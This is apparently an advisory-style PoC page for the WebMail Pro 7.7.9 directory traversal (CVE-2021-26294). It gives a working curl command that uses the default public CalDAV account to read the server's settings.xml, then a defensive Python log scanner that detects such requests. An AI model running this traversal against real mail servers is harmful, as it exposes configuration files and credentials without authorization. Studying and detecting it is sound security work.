    WebMail Pro 7.7.9 目录遍历 (CVE-2021-26294).md
    576 B / 2021-05-21 09:14:38
    # WebMail Pro 7.7.9 Directory Traversal (CVE-2021-26294)
    
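    AfterLogic Aurora and WebMail Pro version 7.7.9 and all lower versions are affected. The vulnerability allows an unauthorized attacker to read files, such as database/user configuration files.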
    
    PoC:
    
    
    ```
    curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
    ```
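
A log check for the request pattern in the PoC above, as an added example that is not part of the original page or of the AfterLogic project: it flags requests to the DAV files endpoint whose path still contains a `..` segment after repeated percent-decoding, and notes whether the public CalDAV account was used and whether the server answered 200. The Combined Log Format, the sample log lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
DAV_PREFIX = "/dav/server.php/files/"          # endpoint from the page's PoC
PUBLIC_USER = "caldav_public_user@localhost"   # account from the page's PoC

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - caldav_public_user@localhost [21/May/2021:09:14:38 +0000] '
    '"GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml'
    ' HTTP/1.1" 200 4312 "-" "curl/7.68.0"',
    '198.51.100.4 - alice@example.org [21/May/2021:09:15:02 +0000] '
    '"PROPFIND /dav/server.php/files/personal/reports/ HTTP/1.1" 207 912 "-" "dav-client"',
    '203.0.113.7 - - [21/May/2021:09:16:10 +0000] '
    '"GET /dav/server.php/files/personal/%252e%252e/%252e%252e/data/settings/settings.xml'
    ' HTTP/1.1" 401 0 "-" "curl/7.68.0"',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e is treated like %2e%2e."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(target):
    """True if a DAV files request contains a '..' segment after decoding."""
    path = fully_decode(target.split("?", 1)[0]).replace("\\", "/")
    if not path.lower().startswith(DAV_PREFIX):
        return False
    return ".." in path[len(DAV_PREFIX):].split("/")

def scan(lines):
    """Return one finding per log line that matches the traversal pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and has_traversal(m["target"]):
            findings.append({"ip": m["ip"], "public_account": m["user"] == PUBLIC_USER,
                             "served": m["status"] == "200", "target": m["target"]})
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A finding with `served` set means the server returned a body for the request, so the file it names (here `settings.xml`) should be treated as disclosed and any secrets it holds rotated.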
    
    ref:
    
    * https://nvd.nist.gov/vuln/detail/CVE-2021-26294
    * https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
    